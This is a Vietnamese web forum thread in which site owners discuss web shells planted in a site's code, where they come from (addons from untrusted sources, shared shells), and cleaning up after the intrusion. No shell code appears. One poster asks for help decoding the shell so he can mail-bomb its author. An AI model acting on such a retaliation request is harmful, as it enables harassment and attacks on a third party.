    aviaiva Thượng Đế

    Tham gia:
    01/03/2016
    Bài viết:
    339
    Đã được thích:
    265
    Điểm thành tích:
    63
    Nơi ở:
    hn
    Web:
    bác tìm với từ khóa quýet virus cho web, kiếm tra shell trong code ... rồi làm theo, thấy mấy cái cảnh báo màu đỏ hoặc vàng đầy trong code ngay, nhưng mà chả sao hết
     
    THB thích bài này.
  • xenmax

    xenmax Thượng Đế

    Tham gia:
    28/11/2017
    Bài viết:
    45
    Đã được thích:
    44
    Điểm thành tích:
    18
    Giới tính:
    Nam
    Nơi ở:
    vn
    cái shell này có thể hacker lợi dụng web bạn để local attack web khác cùng server. Cũng có thể do bạn download addon hoặc style từ các site rác. họ chèn shell vào code share
    Pass svn này là shell của tay sinhviennet dùng, tay này trc chuyên hack code rồi bán. Cũng có thể là người khác dùng con shell này nhưng ko đổi pass
     
    dakhucquan.net, THB and quick87 like this.
  • vanphu113

    vanphu113 Cộng Sự Đắc Lực Thành viên BQT

    Tham gia:
    10/11/2016
    Bài viết:
    136
    Đã được thích:
    81
    Điểm thành tích:
    28
    Nghề nghiệp:
    CEO Founder
    Nơi ở:
    HCMC
    Web:
    Shell thì có thể được share tren mạng thôi, dựa vào shell không thể xác định được ai là người dùng đâu bạn.
    Ví dụ: shell của hvn cũng được đầy người khác dùng lại nguyên info cũ thôi bạn nhưng không phải do hvn up. Vì thế bạn cần kiểm tra log server hoặc yêu càu bên host kiểm tra nhé. Hosting giờ đa phần là server đều cài cloudlinux nên localattack chắc không có khả năng lắm. Code có bug hoặc dùng code share thôi.
    Đôi điều cùng bạn. @THB
     
    THB thích bài này.
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Tham gia:
    27/06/2015
    Bài viết:
    312
    Đã được thích:
    133
    Điểm thành tích:
    43
    Giới tính:
    Nam
    Bác nào decode cho e xin với :(, e muốn biết cái mail mà boom chết tổ thằng chèn vào host e :((
    Đính kèm dưới, bác nào mò thì kéo về mo, full ctr panel của shelll
    Mã:
    
    
     

    Các file đính kèm:

    Chỉnh sửa cuối: 20/12/2017
    THB thích bài này.
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Tham gia:
    27/06/2015
    Bài viết:
    312
    Đã được thích:
    133
    Điểm thành tích:
    43
    Giới tính:
    Nam
    thế đấy các bác ạ :))
     
    Chỉnh sửa cuối: 09/04/2020
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Tham gia:
    27/06/2015
    Bài viết:
    312
    Đã được thích:
    133
    Điểm thành tích:
    43
    Giới tính:
    Nam
    xóa sạch code rồi và đang chờ thằng sp nó cài lại host. ko biết nó up tay hay tools mà folder nào củng thấy shell vậy các bác nhể
     
    THB thích bài này.
  • Chia sẻ trang này